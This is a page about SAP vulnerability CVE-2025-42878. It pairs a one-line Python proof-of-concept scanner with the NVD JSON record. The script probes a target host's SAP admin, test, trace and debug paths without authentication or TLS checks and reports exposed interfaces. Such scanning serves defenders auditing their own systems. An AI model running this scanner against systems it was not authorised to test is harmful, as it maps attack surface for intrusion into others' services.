CVE-2025-42878

# CVE-2025-42878 PoC - SAP Web Dispatcher/ICM Internal Interface Access # This PoC demonstrates accessing exposed internal testing interfaces import requests import sys TARGET_HOST = "https://target-sap-system.com" def test_exposed_interfaces(): """Test for exposed SAP Web Dispatcher/ICM internal testing interfaces""" # Common internal testing interface paths test_paths = [ "/sap/admin/public/default.html", "/sap/admin/test/info", "/sap/diag/test", "/sap/icm/test", "/sap/webdisp/test", "/sap/icm/trace", "/sap/icm/config", "/sap/admin/cgi", "/sap/startsrv", "/sap/monitor", "/sap/techsupport", "/sap/debug" ] print(f"[*] Scanning {TARGET_HOST} for exposed internal interfaces...") for path in test_paths: url = f"{TARGET_HOST}{path}" try: response = requests.get(url, timeout=10, verify=False) if response.status_code == 200: print(f"[+] VULNERABLE: {url} - Interface exposed!") print(f" Status: {response.status_code}") print(f" Content-Type: {response.headers.get('Content-Type', 'N/A')}") elif response.status_code == 401 or response.status_code == 403: print(f"[-] Protected: {url}") else: print(f"[*] Checking: {url} - Status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error accessing {url}: {e}") def test_diagnostic_endpoints(): """Test for diagnostic and info endpoints that may leak information""" diagnostic_paths = [ "/sap/icm/info", "/sap/webdisp/info", "/sap/admin/status", "/sap/trace/active", "/sap/conn/active" ] print(f"\n[*] Checking diagnostic endpoints...") for path in diagnostic_paths: url = f"{TARGET_HOST}{path}" try: response = requests.get(url, timeout=10, verify=False) if "SAP" in response.text or response.status_code == 200: print(f"[+] Info leak: {url}") print(f" Response length: {len(response.text)} bytes") except: pass if __name__ == "__main__": if len(sys.argv) > 1: TARGET_HOST = sys.argv[1] test_exposed_interfaces() test_diagnostic_endpoints() print("\n[*] Scan complete. If vulnerable interfaces found, apply SAP Security Note 3684682")

{"cve": {"id": "CVE-2025-42878", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:17:52.230", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "SAP Web Dispatcher and ICM may expose internal testing interfaces that are not intended for production. If enabled, unauthenticated attackers could exploit them to access diagnostics, send crafted requests, or disrupt services. This vulnerability has a high impact on confidentiality, availability and low impact on integrity and of the application."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:H", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1244"}]}], "references": [{"url": "https://me.sap.com/notes/3684682", "source": "[email protected]"}, {"url": "https://url.sap/sapsecuritypatchday", "source": "[email protected]"}]}}